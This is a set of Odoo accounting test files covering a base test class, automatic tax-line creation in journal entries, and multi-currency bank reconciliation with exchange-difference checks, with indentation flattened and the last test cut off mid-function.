#### File: account/tests/account_test_classes.py
```python
import logging
_logger = logging.getLogger(__name__)
from odoo.tests.common import HttpCase, tagged
class AccountingTestCase(HttpCase):
""" This class extends the base TransactionCase, in order to test the
accounting with localization setups. It is configured to run the tests after
the installation of all modules, and will SKIP TESTS if it cannot find an already
configured accounting (which means no localization module has been installed).
"""
def setUp(self):
super(AccountingTestCase, self).setUp()
domain = [('company_id', '=', self.env.ref('base.main_company').id)]
if not self.env['account.account'].search_count(domain):
_logger.warn('Test skipped because there is no chart of account defined ...')
self.skipTest("No Chart of account found")
def ensure_account_property(self, property_name):
'''Ensure the ir.property targeting an account.account passed as parameter exists.
In case it's not: create it with a random account. This is useful when testing with
partially defined localization (missing stock properties for example)
:param property_name: The name of the property.
'''
company_id = self.env.user.company_id
field_id = self.env['ir.model.fields'].search(
[('model', '=', 'product.template'), ('name', '=', property_name)], limit=1)
property_id = self.env['ir.property'].search([
('company_id', '=', company_id.id),
('name', '=', property_name),
('res_id', '=', None),
('fields_id', '=', field_id.id)], limit=1)
account_id = self.env['account.account'].search([('company_id', '=', company_id.id)], limit=1)
value_reference = 'account.account,%d' % account_id.id
if property_id and not property_id.value_reference:
property_id.value_reference = value_reference
else:
self.env['ir.property'].create({
'name': property_name,
'company_id': company_id.id,
'fields_id': field_id.id,
'value_reference': value_reference,
})
```
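A minimal sketch of how a localization test might build on `AccountingTestCase` and `ensure_account_property` (illustrative only; the subclass name is made up and `property_account_income_id` is just one example of a product.template property).
```python
from odoo.addons.account.tests.account_test_classes import AccountingTestCase

# Illustrative subclass: guard against a partially defined localization before the test runs.
class TestWithIncomeProperty(AccountingTestCase):
    def setUp(self):
        super(TestWithIncomeProperty, self).setUp()
        # Create the ir.property with a fallback account if the localization did not define it.
        self.ensure_account_property('property_account_income_id')
```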
#### File: account/tests/test_account_move_taxes_edition.py
```python
from odoo.addons.account.tests.account_test_classes import AccountingTestCase
from odoo.tests import tagged
from odoo.tests.common import Form
@tagged('post_install', '-at_install')
class TestAccountMoveTaxesEdition(AccountingTestCase):
def setUp(self):
super(TestAccountMoveTaxesEdition, self).setUp()
self.percent_tax = self.env['account.tax'].create({
'name': 'tax_line',
'amount_type': 'percent',
'amount': 10,
})
self.account = self.env['account.account'].search([('deprecated', '=', False)], limit=1)
self.journal = self.env['account.journal'].search([], limit=1)
def test_onchange_taxes_1(self):
'''
Test an account.move.line is created automatically when adding a tax.
This test uses the following scenario:
- Create manually a debit line of 1000 having a tax.
- Assume a line containing the tax amount is created automatically.
- Create manually a credit line to balance the two previous lines.
- Save the move.
tax = 10%
Name | Debit | Credit | Tax_ids | Tax_line_id's name
----------------|-----------|-----------|---------------|-------------------
debit_line_1 | 1000 | | tax |
tax_line | 100 | | | tax_line
credit_line_1 | | 1100 | |
'''
move_form = Form(self.env['account.move'], view='account.view_move_form')
move_form.ref = 'azerty'
move_form.journal_id = self.journal
# Create a new account.move.line with debit amount.
with move_form.line_ids.new() as debit_line:
debit_line.name = 'debit_line_1'
debit_line.account_id = self.account
debit_line.debit = 1000
debit_line.tax_ids.clear()
debit_line.tax_ids.add(self.percent_tax)
self.assertTrue(debit_line.recompute_tax_line)
# Create a third account.move.line with credit amount.
with move_form.line_ids.new() as credit_line:
credit_line.name = 'credit_line_1'
credit_line.account_id = self.account
credit_line.credit = 1100
move = move_form.save()
self.assertRecordValues(move.line_ids, [
{'name': 'credit_line_1', 'debit': 0.0, 'credit': 1100.0, 'tax_ids': [], 'tax_line_id': False},
{'name': 'tax_line', 'debit': 100.0, 'credit': 0.0, 'tax_ids': [], 'tax_line_id': self.percent_tax.id},
{'name': 'debit_line_1', 'debit': 1000.0, 'credit': 0.0, 'tax_ids': [self.percent_tax.id], 'tax_line_id': False},
])
def test_onchange_taxes_2(self):
'''
Test the amount of tax account.move.line is adapted when editing the account.move.line amount.
This test uses the following scenario:
- Create manually a debit line of 1000 having a tax.
- Assume a line containing the tax amount is created automatically.
- Set the debit amount to 2000 in the first created line.
- Assume the line containing the tax amount has been updated automatically.
- Create manually a credit line to balance the two previous lines.
- Save the move.
tax = 10%
Name | Debit | Credit | Tax_ids | Tax_line_id's name
----------------|-----------|-----------|---------------|-------------------
debit_line_1 | 2000 | | tax |
tax_line | 200 | | | tax_line
credit_line_1 | | 2200 | |
'''
move_form = Form(self.env['account.move'], view='account.view_move_form')
move_form.ref = 'azerty'
move_form.journal_id = self.journal
# Create a new account.move.line with debit amount.
with move_form.line_ids.new() as debit_line:
debit_line.name = 'debit_line_1'
debit_line.account_id = self.account
debit_line.debit = 1000
debit_line.tax_ids.clear()
debit_line.tax_ids.add(self.percent_tax)
self.assertTrue(debit_line.recompute_tax_line)
debit_line.debit = 2000
self.assertTrue(debit_line.recompute_tax_line)
# Create a third account.move.line with credit amount.
with move_form.line_ids.new() as credit_line:
credit_line.name = 'credit_line_1'
credit_line.account_id = self.account
credit_line.credit = 2200
move = move_form.save()
self.assertRecordValues(move.line_ids, [
{'name': 'credit_line_1', 'debit': 0.0, 'credit': 2200.0, 'tax_ids': [], 'tax_line_id': False},
{'name': 'tax_line', 'debit': 200.0, 'credit': 0.0, 'tax_ids': [], 'tax_line_id': self.percent_tax.id},
{'name': 'debit_line_1', 'debit': 2000.0, 'credit': 0.0, 'tax_ids': [self.percent_tax.id], 'tax_line_id': False},
])
def test_onchange_taxes_3(self):
'''
Test the amount of tax account.move.line is still editable manually.
Test the amount of tax account.move.line is cumulative for the same tax.
This test uses the following scenario:
- Create manually a debit line of 1000 having a tax.
- Assume a line containing the tax amount is created automatically.
- Edit the tax line amount of the auto-generated line by adding 5.
- Create manually a credit line to balance the two previous lines.
- Save the move.
- Edit the move.
- Create manually a debit line of 2000 having the same tax.
- Assume the line containing the tax amount has been updated (no new line created).
- Create manually a credit line to balance the four previous lines.
- Save the move.
tax = 10%
Name | Debit | Credit | Tax_ids | Tax_line_id's name
----------------|-----------|-----------|---------------|-------------------
debit_line_1 | 1000 | | tax |
tax_line | 300 | | | tax_line
credit_line_1 | | 1105 | |
debit_line_2 | 2000 | | tax |
credit_line_2 | | 2195 | |
'''
move_form = Form(self.env['account.move'], view='account.view_move_form')
move_form.ref = 'azerty'
move_form.journal_id = self.journal
# Create a new account.move.line with debit amount.
with move_form.line_ids.new() as debit_line:
debit_line.name = 'debit_line_1'
debit_line.account_id = self.account
debit_line.debit = 1000
debit_line.tax_ids.clear()
debit_line.tax_ids.add(self.percent_tax)
self.assertTrue(debit_line.recompute_tax_line)
# Edit the tax account.move.line
with move_form.line_ids.edit(index=1) as tax_line:
tax_line.debit = 105 # Was 100
# Create a third account.move.line with credit amount.
with move_form.line_ids.new() as credit_line:
credit_line.name = 'credit_line_1'
credit_line.account_id = self.account
credit_line.credit = 1105
move = move_form.save()
move_form = Form(move, view='account.view_move_form')
# Create a new account.move.line with debit amount.
with move_form.line_ids.new() as debit_line2:
debit_line2.name = 'debit_line_2'
debit_line2.account_id = self.account
debit_line2.debit = 2000
debit_line2.tax_ids.clear()
debit_line2.tax_ids.add(self.percent_tax)
self.assertTrue(debit_line2.recompute_tax_line)
with move_form.line_ids.new() as credit_line2:
credit_line2.name = 'credit_line_2'
credit_line2.account_id = self.account
credit_line2.credit = 2195
move = move_form.save()
self.assertRecordValues(move.line_ids, [
{'name': 'credit_line_2', 'debit': 0.0, 'credit': 2195.0, 'tax_ids': [], 'tax_line_id': False},
{'name': 'debit_line_2', 'debit': 2000.0, 'credit': 0.0, 'tax_ids': [self.percent_tax.id], 'tax_line_id': False},
{'name': 'credit_line_1', 'debit': 0.0, 'credit': 1105.0, 'tax_ids': [], 'tax_line_id': False},
{'name': 'tax_line', 'debit': 300.0, 'credit': 0.0, 'tax_ids': [], 'tax_line_id': self.percent_tax.id},
{'name': 'debit_line_1', 'debit': 1000.0, 'credit': 0.0, 'tax_ids': [self.percent_tax.id], 'tax_line_id': False},
])
```
#### File: account/tests/test_reconciliation.py
```python
from odoo import api, fields
from odoo.addons.account.tests.account_test_classes import AccountingTestCase
from odoo.tests import tagged
import time
import unittest
# TODO in master
# The name of this class should be TestReconciliationHelpers
class TestReconciliation(AccountingTestCase):
"""Tests for reconciliation (account.tax)
Test used to check that when doing a sale or purchase invoice in a different currency,
the result will be balanced.
"""
def setUp(self):
super(TestReconciliation, self).setUp()
self.account_invoice_model = self.env['account.invoice']
self.account_invoice_line_model = self.env['account.invoice.line']
self.acc_bank_stmt_model = self.env['account.bank.statement']
self.acc_bank_stmt_line_model = self.env['account.bank.statement.line']
self.res_currency_model = self.registry('res.currency')
self.res_currency_rate_model = self.registry('res.currency.rate')
partner_agrolait = self.env.ref("base.res_partner_2")
self.partner_agrolait_id = partner_agrolait.id
self.currency_swiss_id = self.env.ref("base.CHF").id
self.currency_usd_id = self.env.ref("base.USD").id
self.currency_euro_id = self.env.ref("base.EUR").id
company = self.env.ref('base.main_company')
self.cr.execute("UPDATE res_company SET currency_id = %s WHERE id = %s", [self.currency_euro_id, company.id])
self.account_rcv = partner_agrolait.property_account_receivable_id or self.env['account.account'].search([('user_type_id', '=', self.env.ref('account.data_account_type_receivable').id)], limit=1)
self.account_rsa = partner_agrolait.property_account_payable_id or self.env['account.account'].search([('user_type_id', '=', self.env.ref('account.data_account_type_payable').id)], limit=1)
self.product = self.env.ref("product.product_product_4")
self.bank_journal_euro = self.env['account.journal'].create({'name': 'Bank', 'type': 'bank', 'code': 'BNK67'})
self.account_euro = self.bank_journal_euro.default_debit_account_id
self.bank_journal_usd = self.env['account.journal'].create({'name': 'Bank US', 'type': 'bank', 'code': 'BNK68', 'currency_id': self.currency_usd_id})
self.account_usd = self.bank_journal_usd.default_debit_account_id
self.fx_journal = self.env['res.users'].browse(self.env.uid).company_id.currency_exchange_journal_id
self.diff_income_account = self.env['res.users'].browse(self.env.uid).company_id.income_currency_exchange_account_id
self.diff_expense_account = self.env['res.users'].browse(self.env.uid).company_id.expense_currency_exchange_account_id
self.inbound_payment_method = self.env['account.payment.method'].create({
'name': 'inbound',
'code': 'IN',
'payment_type': 'inbound',
})
self.expense_account = self.env['account.account'].create({
'name': 'EXP',
'code': 'EXP',
'user_type_id': self.env.ref('account.data_account_type_expenses').id,
'company_id': company.id,
})
# cash basis intermediary account
self.tax_waiting_account = self.env['account.account'].create({
'name': 'TAX_WAIT',
'code': 'TWAIT',
'user_type_id': self.env.ref('account.data_account_type_current_liabilities').id,
'reconcile': True,
'company_id': company.id,
})
# cash basis final account
self.tax_final_account = self.env['account.account'].create({
'name': 'TAX_TO_DEDUCT',
'code': 'TDEDUCT',
'user_type_id': self.env.ref('account.data_account_type_current_assets').id,
'company_id': company.id,
})
self.tax_base_amount_account = self.env['account.account'].create({
'name': 'TAX_BASE',
'code': 'TBASE',
'user_type_id': self.env.ref('account.data_account_type_current_assets').id,
'company_id': company.id,
})
# Journals
self.purchase_journal = self.env['account.journal'].create({
'name': 'purchase',
'code': 'PURCH',
'type': 'purchase',
})
self.cash_basis_journal = self.env['account.journal'].create({
'name': 'CABA',
'code': 'CABA',
'type': 'general',
})
self.general_journal = self.env['account.journal'].create({
'name': 'general',
'code': 'GENE',
'type': 'general',
})
# Tax Cash Basis
self.tax_cash_basis = self.env['account.tax'].create({
'name': 'cash basis 20%',
'type_tax_use': 'purchase',
'company_id': company.id,
'amount': 20,
'account_id': self.tax_waiting_account.id,
'tax_exigibility': 'on_payment',
'cash_basis_account_id': self.tax_final_account.id,
'cash_basis_base_account_id': self.tax_base_amount_account.id,
})
def create_invoice(self, type='out_invoice', invoice_amount=50, currency_id=None):
#we create an invoice in given currency
invoice = self.account_invoice_model.create({'partner_id': self.partner_agrolait_id,
'currency_id': currency_id,
'name': type == 'out_invoice' and 'invoice to client' or 'invoice to vendor',
'account_id': self.account_rcv.id,
'type': type,
'date_invoice': time.strftime('%Y') + '-07-01',
})
self.account_invoice_line_model.create({'product_id': self.product.id,
'quantity': 1,
'price_unit': invoice_amount,
'invoice_id': invoice.id,
'name': 'product that cost ' + str(invoice_amount),
'account_id': self.env['account.account'].search([('user_type_id', '=', self.env.ref('account.data_account_type_revenue').id)], limit=1).id,
})
#validate invoice
invoice.action_invoice_open()
return invoice
def create_invoice_partner(self, type='out_invoice', invoice_amount=50, currency_id=None, partner_id=False):
#we create an invoice in given currency
invoice = self.account_invoice_model.create({'partner_id': partner_id,
'currency_id': currency_id,
'name': type == 'out_invoice' and 'invoice to client' or 'invoice to vendor',
'account_id': self.account_rcv.id,
'type': type,
'date_invoice': time.strftime('%Y') + '-07-01',
})
self.account_invoice_line_model.create({'product_id': self.product.id,
'quantity': 1,
'price_unit': invoice_amount,
'invoice_id': invoice.id,
'name': 'product that cost ' + str(invoice_amount),
'account_id': self.env['account.account'].search([('user_type_id', '=', self.env.ref('account.data_account_type_revenue').id)], limit=1).id,
})
#validate invoice
invoice.action_invoice_open()
return invoice
def make_payment(self, invoice_record, bank_journal, amount=0.0, amount_currency=0.0, currency_id=None):
bank_stmt = self.acc_bank_stmt_model.create({
'journal_id': bank_journal.id,
'date': time.strftime('%Y') + '-07-15',
'name': 'payment' + invoice_record.number
})
bank_stmt_line = self.acc_bank_stmt_line_model.create({'name': 'payment',
'statement_id': bank_stmt.id,
'partner_id': self.partner_agrolait_id,
'amount': amount,
'amount_currency': amount_currency,
'currency_id': currency_id,
'date': time.strftime('%Y') + '-07-15',})
#reconcile the payment with the invoice
for l in invoice_record.move_id.line_ids:
if l.account_id.id == self.account_rcv.id:
line_id = l
break
amount_in_widget = currency_id and amount_currency or amount
bank_stmt_line.process_reconciliation(counterpart_aml_dicts=[{
'move_line': line_id,
'debit': amount_in_widget < 0 and -amount_in_widget or 0.0,
'credit': amount_in_widget > 0 and amount_in_widget or 0.0,
'name': line_id.name,
}])
return bank_stmt
def make_customer_and_supplier_flows(self, invoice_currency_id, invoice_amount, bank_journal, amount, amount_currency, transaction_currency_id):
#we create an invoice in given invoice_currency
invoice_record = self.create_invoice(type='out_invoice', invoice_amount=invoice_amount, currency_id=invoice_currency_id)
#we encode a payment on it, on the given bank_journal with amount, amount_currency and transaction_currency given
bank_stmt = self.make_payment(invoice_record, bank_journal, amount=amount, amount_currency=amount_currency, currency_id=transaction_currency_id)
customer_move_lines = bank_stmt.move_line_ids
#we create a supplier bill in given invoice_currency
invoice_record = self.create_invoice(type='in_invoice', invoice_amount=invoice_amount, currency_id=invoice_currency_id)
#we encode a payment on it, on the given bank_journal with amount, amount_currency and transaction_currency given
bank_stmt = self.make_payment(invoice_record, bank_journal, amount=-amount, amount_currency=-amount_currency, currency_id=transaction_currency_id)
supplier_move_lines = bank_stmt.move_line_ids
return customer_move_lines, supplier_move_lines
@tagged('post_install', '-at_install')
class TestReconciliationExec(TestReconciliation):
def test_statement_usd_invoice_eur_transaction_eur(self):
customer_move_lines, supplier_move_lines = self.make_customer_and_supplier_flows(self.currency_euro_id, 30, self.bank_journal_usd, 42, 30, self.currency_euro_id)
self.assertRecordValues(customer_move_lines, [
{'debit': 30.0, 'credit': 0.0, 'amount_currency': 42, 'currency_id': self.currency_usd_id},
{'debit': 0.0, 'credit': 30.0, 'amount_currency': -42, 'currency_id': self.currency_usd_id},
])
self.assertRecordValues(supplier_move_lines, [
{'debit': 0.0, 'credit': 30.0, 'amount_currency': -42, 'currency_id': self.currency_usd_id},
{'debit': 30.0, 'credit': 0.0, 'amount_currency': 42, 'currency_id': self.currency_usd_id},
])
def test_statement_usd_invoice_usd_transaction_usd(self):
customer_move_lines, supplier_move_lines = self.make_customer_and_supplier_flows(self.currency_usd_id, 50, self.bank_journal_usd, 50, 0, False)
self.assertRecordValues(customer_move_lines, [
{'debit': 32.70, 'credit': 0.0, 'amount_currency': 50, 'currency_id': self.currency_usd_id},
{'debit': 0.0, 'credit': 32.70, 'amount_currency': -50, 'currency_id': self.currency_usd_id},
])
self.assertRecordValues(supplier_move_lines, [
{'debit': 0.0, 'credit': 32.70, 'amount_currency': -50, 'currency_id': self.currency_usd_id},
{'debit': 32.70, 'credit': 0.0, 'amount_currency': 50, 'currency_id': self.currency_usd_id},
])
def test_statement_usd_invoice_usd_transaction_eur(self):
customer_move_lines, supplier_move_lines = self.make_customer_and_supplier_flows(self.currency_usd_id, 50, self.bank_journal_usd, 50, 40, self.currency_euro_id)
self.assertRecordValues(customer_move_lines, [
{'debit': 40.0, 'credit': 0.0, 'amount_currency': 50, 'currency_id': self.currency_usd_id},
{'debit': 0.0, 'credit': 40.0, 'amount_currency': -50, 'currency_id': self.currency_usd_id},
])
exchange_lines = customer_move_lines.mapped('full_reconcile_id.exchange_move_id.line_ids')
self.assertRecordValues(exchange_lines, [
{'debit': 0.0, 'credit': 7.30, 'account_id': self.diff_income_account.id},
{'debit': 7.30, 'credit': 0.0, 'account_id': self.account_rcv.id},
])
self.assertRecordValues(supplier_move_lines, [
{'debit': 0.0, 'credit': 40.0, 'amount_currency': -50, 'currency_id': self.currency_usd_id},
{'debit': 40.0, 'credit': 0.0, 'amount_currency': 50, 'currency_id': self.currency_usd_id},
])
exchange_lines = supplier_move_lines.mapped('full_reconcile_id.exchange_move_id.line_ids')
self.assertRecordValues(exchange_lines, [
{'debit': 7.30, 'credit': 0.0, 'account_id': self.diff_expense_account.id},
{'debit': 0.0, 'credit': 7.30, 'account_id': self.account_rcv.id},
])
def test_statement_usd_invoice_chf_transaction_chf(self):
customer_move_lines, supplier_move_lines = self.make_customer_and_supplier_flows(self.currency_swiss_id, 50, self.bank_journal_usd, 42, 50, self.currency_swiss_id)
self.assertRecordValues(customer_move_lines, [
{'debit': 27.47, 'credit': 0.0, 'amount_currency': 42, 'currency_id': self.currency_usd_id},
{'debit': 0.0, 'credit': 27.47, 'amount_currency': -50, 'currency_id': self.currency_swiss_id},
])
exchange_lines = customer_move_lines.mapped('full_reconcile_id.exchange_move_id.line_ids')
self.assertRecordValues(exchange_lines, [
{'debit': 10.74, 'credit': 0.0, 'account_id': self.diff_expense_account.id},
{'debit': 0.0, 'credit': 10.74, 'account_id': self.account_rcv.id},
])
self.assertRecordValues(supplier_move_lines, [
{'debit': 0.0, 'credit': 27.47, 'amount_currency': -42, 'currency_id': self.currency_usd_id},
{'debit': 27.47, 'credit': 0.0, 'amount_currency': 50, 'currency_id': self.currency_swiss_id},
])
exchange_lines = supplier_move_lines.mapped('full_reconcile_id.exchange_move_id.line_ids')
self.assertRecordValues(exchange_lines, [
{'debit': 0.0, 'credit': 10.74, 'account_id': self.diff_income_account.id},
{'debit': 10.74, 'credit': 0.0, 'account_id': self.account_rcv.id},
])
def test_statement_eur_invoice_usd_transaction_usd(self):
customer_move_lines, supplier_move_lines = self.make_customer_and_supplier_flows(self.currency_usd_id, 50, self.bank_journal_euro, 40, 50, self.currency_usd_id)
self.assertRecordValues(customer_move_lines, [
{'debit': 40.0, 'credit': 0.0, 'amount_currency': 50, 'currency_id': self.currency_usd_id},
{'debit': 0.0, 'credit': 40.0, 'amount_currency': -50, 'currency_id': self.currency_usd_id},
])
exchange_lines = customer_move_lines.mapped('full_reconcile_id.exchange_move_id.line_ids')
self.assertRecordValues(exchange_lines, [
{'debit': 0.0, 'credit': 7.30, 'account_id': self.diff_income_account.id},
{'debit': 7.30, 'credit': 0.0, 'account_id': self.account_rcv.id},
])
self.assertRecordValues(supplier_move_lines, [
{'debit': 0.0, 'credit': 40.0, 'amount_currency': -50, 'currency_id': self.currency_usd_id},
{'debit': 40.0, 'credit': 0.0, 'amount_currency': 50, 'currency_id': self.currency_usd_id},
])
exchange_lines = supplier_move_lines.mapped('full_reconcile_id.exchange_move_id.line_ids')
self.assertRecordValues(exchange_lines, [
{'debit': 7.30, 'credit': 0.0, 'account_id': self.diff_expense_account.id},
{'debit': 0.0, 'credit': 7.30, 'account_id': self.account_rcv.id},
])
def test_statement_eur_invoice_usd_transaction_eur(self):
customer_move_lines, supplier_move_lines = self.make_customer_and_supplier_flows(self.currency_usd_id, 50, self.bank_journal_euro, 40, 0.0, False)
self.assertRecordValues(customer_move_lines, [
{'debit': 40.0, 'credit': 0.0, 'amount_currency': 0.0, 'currency_id': False},
{'debit': 0.0, 'credit': 40.0, 'amount_currency': 0.0, 'currency_id': False},
])
self.assertRecordValues(supplier_move_lines, [
{'debit': 0.0, 'credit': 40.0, 'amount_currency': 0.0, 'currency_id': False},
{'debit': 40.0, 'credit': 0.0, 'amount_currency': 0.0, 'currency_id': False},
])
def test_statement_euro_invoice_usd_transaction_chf(self):
customer_move_lines, supplier_move_lines = self.make_customer_and_supplier_flows(self.currency_usd_id, 50, self.bank_journal_euro, 42, 50, self.currency_swiss_id)
self.assertRecordValues(customer_move_lines, [
{'debit': 42.0, 'credit': 0.0, 'amount_currency': 50, 'currency_id': self.currency_swiss_id},
{'debit': 0.0, 'credit': 42.0, 'amount_currency': -50, 'currency_id': self.currency_swiss_id},
])
self.assertRecordValues(supplier_move_lines, [
{'debit': 0.0, 'credit': 42.0, 'amount_currency': -50, 'currency_id': self.currency_swiss_id},
{'debit': 42.0, 'credit': 0.0, 'amount_currency': 50, 'currency_id': self.currency_swiss_id},
])
def test_statement_euro_invoice_usd_transaction_euro_full(self):
#we create an invoice in given invoice_currency
invoice_record = self.create_invoice(type='out_invoice', invoice_amount=50, currency_id=self.currency_usd_id)
#we encode a payment on it, on the given bank_journal with amount, amount_currency and transaction_currency given
bank_stmt = self.acc_bank_stmt_model.create({
'journal_id': self.bank_journal_euro.id,
'date': time.strftime('%Y') + '-01-01',
})
bank_stmt_line = self.acc_bank_stmt_line_model.create({'name': 'payment',
'statement_id': bank_stmt.id,
'partner_id': self.partner_agrolait_id,
'amount': 40,
'date': time.strftime('%Y') + '-01-01',})
#reconcile the payment with the invoice
for l in invoice_record.move_id.line_ids:
if l.account_id.id == self.account_rcv.id:
line_id = l
break
bank_stmt_line.process_reconciliation(counterpart_aml_dicts=[{
'move_line': line_id,
'debit': 0.0,
'credit': 32.7,
'name': 'test_statement_euro_invoice_usd_transaction_euro_full',
}], new_aml_dicts=[{
'debit': 0.0,
'credit': 7.3,
'name': 'exchange difference',
'account_id': self.diff_income_account.id
}])
self.assertRecordValues(bank_stmt.move_line_ids, [
{'debit': 40.0, 'credit': 0.0, 'amount_currency': 0.0, 'currency_id': False},
{'debit': 0.0, 'credit': 32.7, 'amount_currency': 0.0, 'currency_id': False},
{'debit': 0.0, 'credit': 7.3, 'amount_currency': 0.0, 'currency_id': False},
])
# The invoice should be paid, as the payments totally cover its total
self.assertEquals(invoice_record.state, 'paid', 'The invoice should be paid by now')
invoice_rec_line = invoice_record.move_id.line_ids.filtered(lambda x: x.account_id.reconcile)
self.assertTrue(invoice_rec_line.reconciled, 'The invoice should be totally reconciled')
self.assertTrue(invoice_rec_line.full_reconcile_id, 'The invoice should have a full reconcile number')
self.assertEquals(invoice_rec_line.amount_residual, 0, 'The invoice should be totally reconciled')
self.assertEquals(invoice_rec_line.amount_residual_currency, 0, 'The invoice should be totally reconciled')
@unittest.skip('adapt to new accounting')
def test_balanced_exchanges_gain_loss(self):
# The point of this test is to show that we handle correctly the gain/loss exchanges during reconciliations in foreign currencies.
# For instance, with a company set in EUR, and a USD rate set to 0.033,
# the reconciliation of an invoice of 2.00 USD (60.61 EUR) and a bank statement of two lines of 1.00 USD (30.30 EUR)
# will lead to an exchange loss, that should be handled correctly within the journal items.
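# Worked figures: 2.00 USD / 0.033 = 60.61 EUR for the invoice, while each 1.00 USD statement line
# converts to 30.30 EUR; 2 x 30.30 = 60.60 EUR, leaving the 0.01 EUR exchange loss asserted below.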
env = api.Environment(self.cr, self.uid, {})
# We update the currency rate of the currency USD in order to force the gain/loss exchanges in next steps
rateUSDbis = env.ref("base.rateUSDbis")
rateUSDbis.write({
'name': time.strftime('%Y-%m-%d') + ' 00:00:00',
'rate': 0.033,
})
# We create a customer invoice of 2.00 USD
invoice = self.account_invoice_model.create({
'partner_id': self.partner_agrolait_id,
'currency_id': self.currency_usd_id,
'name': 'Foreign invoice with exchange gain',
'account_id': self.account_rcv_id,
'type': 'out_invoice',
'date_invoice': time.strftime('%Y-%m-%d'),
'journal_id': self.bank_journal_usd_id,
'invoice_line': [
(0, 0, {
'name': 'line that will lead to an exchange gain',
'quantity': 1,
'price_unit': 2,
})
]
})
invoice.action_invoice_open()
# We create a bank statement with two lines of 1.00 USD each.
statement = self.acc_bank_stmt_model.create({
'journal_id': self.bank_journal_usd_id,
'date': time.strftime('%Y-%m-%d'),
'line_ids': [
(0, 0, {
'name': 'half payment',
'partner_id': self.partner_agrolait_id,
'amount': 1.0,
'date': time.strftime('%Y-%m-%d')
}),
(0, 0, {
'name': 'second half payment',
'partner_id': self.partner_agrolait_id,
'amount': 1.0,
'date': time.strftime('%Y-%m-%d')
})
]
})
# We process the reconciliation of the invoice line with the two bank statement lines
line_id = None
for l in invoice.move_id.line_id:
if l.account_id.id == self.account_rcv_id:
line_id = l
break
for statement_line in statement.line_ids:
statement_line.process_reconciliation([
{'counterpart_move_line_id': line_id.id, 'credit': 1.0, 'debit': 0.0, 'name': line_id.name}
])
# The invoice should be paid, as the payments totally cover its total
self.assertEquals(invoice.state, 'paid', 'The invoice should be paid by now')
reconcile = None
for payment in invoice.payment_ids:
reconcile = payment.reconcile_id
break
# The invoice should be reconciled (entirely, not a partial reconciliation)
self.assertTrue(reconcile, 'The invoice should be totally reconciled')
result = {}
exchange_loss_line = None
for line in reconcile.line_id:
res_account = result.setdefault(line.account_id, {'debit': 0.0, 'credit': 0.0, 'count': 0})
res_account['debit'] = res_account['debit'] + line.debit
res_account['credit'] = res_account['credit'] + line.credit
res_account['count'] += 1
if line.credit == 0.01:
exchange_loss_line = line
# We should be able to find a move line of 0.01 EUR on the Debtors account, being the cent we lost during the currency exchange
self.assertTrue(exchange_loss_line, 'There should be one move line of 0.01 EUR in credit')
# The journal items of the reconciliation should have their debit and credit total equal
# Besides, the total debit and total credit should be 60.61 EUR (2.00 USD)
self.assertEquals(sum(res['debit'] for res in result.values()), 60.61)
self.assertEquals(sum(res['credit'] for res in result.values()), 60.61)
counterpart_exchange_loss_line = None
for line in exchange_loss_line.move_id.line_id:
if line.account_id.id == self.account_fx_expense_id:
counterpart_exchange_loss_line = line
# We should be able to find a move line of 0.01 EUR on the Foreign Exchange Loss account
self.assertTrue(counterpart_exchange_loss_line, 'There should be one move line of 0.01 EUR on account "Foreign Exchange Loss"')
def test_manual_reconcile_wizard_opw678153(self):
def create_move(name, amount, amount_currency, currency_id):
debit_line_vals = {
'name': name,
'debit': amount > 0 and amount or 0.0,
'credit': amount < 0 and -amount or 0.0,
'account_id': self.account_rcv.id,
'amount_currency': amount_currency,
'currency_id': currency_id,
}
credit_line_vals = debit_line_vals.copy()
credit_line_vals['debit'] = debit_line_vals['credit']
credit_line_vals['credit'] = debit_line_vals['debit']
credit_line_vals['account_id'] = self.account_rsa.id
credit_line_vals['amount_currency'] = -debit_line_vals['amount_currency']
vals = {
'journal_id': self.bank_journal_euro.id,
'line_ids': [(0,0, debit_line_vals), (0, 0, credit_line_vals)]
}
return self.env['account.move'].create(vals).id
move_list_vals = [
('1', -1.83, 0, self.currency_swiss_id),
('2', 728.35, 795.05, self.currency_swiss_id),
('3', -4.46, 0, self.currency_swiss_id),
('4', 0.32, 0, self.currency_swiss_id),
('5', 14.72, 16.20, self.currency_swiss_id),
('6', -737.10, -811.25, self.currency_swiss_id),
]
move_ids = []
for name, amount, amount_currency, currency_id in move_list_vals:
move_ids.append(create_move(name, amount, amount_currency, currency_id))
aml_recs = self.env['account.move.line'].search([('move_id', 'in', move_ids), ('account_id', '=', self.account_rcv.id), ('reconciled', '=', False)])
aml_recs.reconcile()
for aml in aml_recs:
self.assertTrue(aml.reconciled, 'The journal item should be totally reconciled')
self.assertEquals(aml.amount_residual, 0, 'The journal item should be totally reconciled')
self.assertEquals(aml.amount_residual_currency, 0, 'The journal item should be totally reconciled')
move_list_vals = [
('2', 728.35, 795.05, self.currency_swiss_id),
('3', -4.46, 0, False),
('4', 0.32, 0, False),
('5', 14.72, 16.20, self.currency_swiss_id),
('6', -737.10, -811.25, self.currency_swiss_id),
]
move_ids = []
for name, amount, amount_currency, currency_id in move_list_vals:
move_ids.append(create_move(name, amount, amount_currency, currency_id))
aml_recs = self.env['account.move.line'].search([('move_id', 'in', move_ids), ('account_id', '=', self.account_rcv.id), ('reconciled', '=', False)])
aml_recs.reconcile(self.account_rsa, self.bank_journal_usd)
for aml in aml_recs:
self.assertTrue(aml.reconciled, 'The journal item should be totally reconciled')
self.assertEquals(aml.amount_residual, 0, 'The journal item should be totally reconciled')
self.assertEquals(aml.amount_residual_currency, 0, 'The journal item should be totally reconciled')
def test_manual_reconcile_wizard_same_account(self):
move_ids = self.env['account.move']
debit_line_vals = {
'name': '1',
'debit': 728.35,
'credit': 0.0,
'account_id': self.account_rcv.id,
'amount_currency': 795.05,
'currency_id': self.currency_swiss_id,
}
credit_line_vals = {
'name': '1',
'debit': 0.0,
'credit': 728.35,
'account_id': self.account_rsa.id,
'amount_currency': -795.05,
'currency_id': self.currency_swiss_id,
}
vals = {
'journal_id': self.bank_journal_euro.id,
'date': time.strftime('%Y') + '-02-15',
'line_ids': [(0,0, debit_line_vals), (0, 0, credit_line_vals)]
}
move_ids += self.env['account.move'].create(vals)
debit_line_vals = {
'name': '2',
'debit': 0.0,
'credit': 737.10,
'account_id': self.account_rcv.id,
'amount_currency': -811.25,
'currency_id': self.currency_swiss_id,
}
credit_line_vals = {
'name': '2',
'debit': 737.10,
'credit': 0.0,
'account_id': self.account_rsa.id,
'amount_currency': 811.25,
'currency_id': self.currency_swiss_id,
}
vals = {
'journal_id': self.bank_journal_euro.id,
'date': time.strftime('%Y') + '-07-15',
'line_ids': [(0,0, debit_line_vals), (0, 0, credit_line_vals)]
}
